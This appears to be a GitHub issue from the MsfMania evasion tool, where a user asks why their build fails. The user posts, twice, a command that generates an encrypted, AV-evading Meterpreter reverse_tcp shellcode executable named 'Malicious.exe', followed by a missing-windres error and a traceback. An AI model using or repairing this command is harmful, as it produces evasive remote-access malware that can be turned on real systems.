You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
python3 MsfMania.py -a x64 -p windows/x64/meterpreter/reverse_tcp -lh 192.168.0.10 -lp 1234 -o Malicious -it local --hash md5
[+] Shellcode generated.
[+] Shellcode encrypted.
[+] Evasion code added.
sh: 1: x86_64-w64-mingw32-windres: not found
[+] File compiled and stripped.
Traceback (most recent call last):
File "/home/kali/Downloads/MsfMania/MsfMania.py", line 253, in
original_file_size = check_file_size()
File "/home/kali/Downloads/MsfMania/MsfMania.py", line 186, in check_file_size
fs = path.getsize(filename)
File "/usr/lib/python3.9/genericpath.py", line 50, in getsize
return os.stat(filename).st_size
FileNotFoundError: [Errno 2] No such file or directory: 'output/Malicious.exe'
The text was updated successfully, but these errors were encountered:
Hey,
what do i wrong?
python3 MsfMania.py -a x64 -p windows/x64/meterpreter/reverse_tcp -lh 192.168.0.10 -lp 1234 -o Malicious -it local --hash md5
[+] Shellcode generated.
[+] Shellcode encrypted.
[+] Evasion code added.
sh: 1: x86_64-w64-mingw32-windres: not found
[+] File compiled and stripped.
Traceback (most recent call last):
File "/home/kali/Downloads/MsfMania/MsfMania.py", line 253, in
original_file_size = check_file_size()
File "/home/kali/Downloads/MsfMania/MsfMania.py", line 186, in check_file_size
fs = path.getsize(filename)
File "/usr/lib/python3.9/genericpath.py", line 50, in getsize
return os.stat(filename).st_size
FileNotFoundError: [Errno 2] No such file or directory: 'output/Malicious.exe'
The text was updated successfully, but these errors were encountered: